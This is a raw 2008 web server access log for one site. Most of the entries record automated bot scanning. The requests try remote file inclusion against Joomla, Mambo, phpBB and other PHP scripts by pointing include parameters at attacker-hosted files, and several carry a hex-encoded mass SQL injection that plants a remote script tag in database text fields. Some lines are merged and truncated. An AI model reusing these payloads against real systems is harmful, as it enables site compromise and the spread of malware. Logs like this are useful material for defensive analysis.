77.222.40.42 - - [22/Sep/2008:10:15:23 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:10:15:31 -0700] "GET /logs/access_080813.log/index2.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.42 - - [22/Sep/2008:10:15:38 -0700] "GET /logs/access_080703.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:15:52 -0700] "GET /logs/access_080103.log HTTP/1.0" 200 448825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.67.202.75 - - [22/Sep/2008:10:16:10 -0700] "GET /logs/access_080507.log/index.php?pag=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
62.140.18.71 - - [22/Sep/2008:10:16:32 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.18.71 - - [22/Sep/2008:10:16:32 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:10:16:46 -0700] "GET /logs/index.php?option=com_akogallery&Itemid=&mosConfig_absolute_path=http://www.fotohead.nl/admin/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:10:16:47 -0700] "GET /index.php?option=com_akogallery&Itemid=&mosConfig_absolute_path=http://www.fotohead.nl/admin/bo.do? HTTP/1.1" 200 95004 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:10:16:50 -0700] "GET /logs/index.php?option=com_akogallery&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:10:16:51 -0700] "GET /index.php?option=com_akogallery&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do? HTTP/1.1" 200 94964 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:10:17:00 -0700] "GET /logs/index.php?option=com_akogallery&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:10:17:01 -0700] "GET /index.php?option=com_akogallery&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 200 94966 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:10:17:08 -0700] "GET /logs/access_080524.log//administrator/index.php?option=com_mgm&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.150.238.232 - - [22/Sep/2008:10:17:22 -0700] "GET /logs/access_080109.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272Blajornadanet/us1:58.227.222.150.238.232 - - [22/Sep/2008:10:17:23 -0700] "GET /logs/access_080109.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B4shunyi.yao/us2:59.49.253200.206.234.171 - - [22/Sep/2008:10:17:57 -0700] "GET /logs/access_080511.log//freebsdstuffs/includes/db_adodb.php?baseDir=http://www.albchat.biz/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.234.171 - - [22/Sep/2008:10:18:01 -0700] "GET //freebsdstuffs/includes/db_adodb.php?baseDir=http://www.albchat.biz/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.220.64.3 - - [22/Sep/2008:10:18:01 -0700] "GET /logs/access_080411.log//index.php?pagina=http://h1.ripway.com/dr4g0n/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.234.171 - - [22/Sep/2008:10:18:07 -0700] "GET /logs//freebsdstuffs/includes/db_adodb.php?baseDir=http://www.albchat.biz/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.150.238.232 - - [22/Sep/2008:10:18:08 -0700] "GET /logs/access_080109.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272Bwomen_fitness/us1:156.11222.150.238.232 - - [22/Sep/2008:10:18:10 -0700] "GET /logs/access_080109.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B4planopartyanimals/us2:69208.116.1.202 - - [22/Sep/2008:10:18:19 -0700] "GET /logs/access_080704.log//forum/language/lang_english/lang_main_album.php?phpbb_root_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:18:19 -0700] "GET /logs/access_071219.log//forum/language/lang_english/lang_main_album.php?phpbb_root_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:18:19 -0700] "GET //forum/language/lang_english/lang_main_album.php?phpbb_root_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:18:19 -0700] "GET /logs//forum/language/lang_english/lang_main_album.php?phpbb_root_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:18:20 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:18:23 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:10:18:42 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:10:18:43 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:10:18:44 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.4 - - [22/Sep/2008:10:18:47 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-017_2.jpg HTTP/1.1" 200 453605 "-" "Googlebot-Image/1.0" "dmulk.com"
213.20.229.11 - - [22/Sep/2008:10:18:49 -0700] "GET /logs/access_080830.log%20//index.php?DOCUMENT_ROOT=http://www.fittkau-edv.de/attachments/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.20.229.11 - - [22/Sep/2008:10:18:49 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fittkau-edv.de/attachments/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:18:50 -0700] "GET /logs/access_080811.log//index.php?show=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
213.20.229.11 - - [22/Sep/2008:10:18:50 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.fittkau-edv.de/attachments/v6id.txt??? HTTP/1.1" 200 94833 "-" "libwww-perl/5.76" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:18:55 -0700] "GET /logs/access_080327.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:18:55 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:18:57 -0700] "GET /logs///mambots/content/josowbot.content.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:18:57 -0700] "GET /logs/access_080602.log///mambots/content/josowbot.content.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [22/Sep/2008:10:18:57 -0700] "GET ///mambots/content/josowbot.content.php?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:18:58 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.109.235.52 - - [22/Sep/2008:10:18:59 -0700] "GET /logs/access_080905.log//?mosConfig_absolute_path=http://apai.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:19:00 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.109.235.52 - - [22/Sep/2008:10:19:00 -0700] "GET //?mosConfig_absolute_path=http://apai.100megsfree8.com/id.gif? HTTP/1.1" 200 94766 "-" "libwww-perl/5.803" "www.dmulk.com"
208.109.235.52 - - [22/Sep/2008:10:19:01 -0700] "GET /logs//?mosConfig_absolute_path=http://apai.100megsfree8.com/id.gif? HTTP/1.1" 200 66168 "-" "libwww-perl/5.803" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:10:19:17 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:10:19:17 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:10:19:17 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:19:32 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.alevichat.com/ids.txt?? HTTP/1.1" 200 66168 "-" "libwww-perl/5.76" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:10:19:33 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:19:46 -0700] "GET //?path%5Bdocroot%5D=http://www.alevichat.com/ids.txt?? HTTP/1.1" 200 94714 "-" "libwww-perl/5.76" "www.dmulk.com"
72.249.96.204 - - [22/Sep/2008:10:19:48 -0700] "GET /logs/access_080325.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.96.204 - - [22/Sep/2008:10:19:48 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.96.204 - - [22/Sep/2008:10:19:48 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:19:53 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:19:53 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:19:53 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
217.107.217.183 - - [22/Sep/2008:10:19:53 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.249.96.204 - - [22/Sep/2008:10:19:59 -0700] "GET /logs/access_080310.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:20:04 -0700] "GET /logs/access_080325.log//components/com_performs/performs.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:20:04 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:20:04 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.93.147.155 - - [22/Sep/2008:10:20:07 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.saddlebrookhorsecenter.com/Events/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [22/Sep/2008:10:20:07 -0700] "GET /logs/access_080714.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.saddlebrookhorsecenter.com/Events/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [22/Sep/2008:10:20:08 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.saddlebrookhorsecenter.com/Events/cmd.txt??? HTTP/1.1" 200 95203 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:20:11 -0700] "GET /logs/access_080310.log//components/com_performs/performs.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.93.147.155 - - [22/Sep/2008:10:20:13 -0700] "GET /logs/access_080628.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.saddlebrookhorsecenter.com/Events/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:20:16 -0700] "GET /logs/access_080325.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:20:16 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:20:16 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:20:24 -0700] "GET /logs/access_080310.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:10:20:27 -0700] "GET /logs/access_071222.log/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:10:20:27 -0700] "GET /errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:10:20:28 -0700] "GET /logs/access_080303.log/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:20:30 -0700] "GET /logs/access_080325.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:20:30 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:10:20:30 -0700] "GET /logs//errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:20:30 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:20:33 -0700] "GET /logs//trans/trans.php?trans=ko&page=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:20:33 -0700] "GET /logs/access_080527.log//trans/trans.php?trans=ko&page=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:20:33 -0700] "GET //trans/trans.php?trans=ko&page=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:20:33 -0700] "GET /logs/access_080504.log//trans/trans.php?trans=ko&page=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:10:20:35 -0700] "GET //errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:20:42 -0700] "GET /logs/access_080310.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:21:02 -0700] "GET /logs/access_071127.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:21:04 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.alevichat.com/ids.txt?? HTTP/1.1" 200 66168 "-" "libwww-perl/5.76" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:10:21:09 -0700] "GET /logs/access_080825.log//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:21:12 -0700] "GET //?path%5Bdocroot%5D=http://www.alevichat.com/ids.txt?? HTTP/1.1" 200 94730 "-" "libwww-perl/5.76" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:21:12 -0700] "GET /logs/access_080304.log/?mosConfig_absolute_path=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:21:13 -0700] "GET /logs/?mosConfig_absolute_path=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 200 66163 "-" "libwww-perl/5.810" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:10:21:15 -0700] "GET /logs/access_080824.log//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:21:17 -0700] "GET /?mosConfig_absolute_path=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 200 94809 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.37.2 - - [22/Sep/2008:10:21:23 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
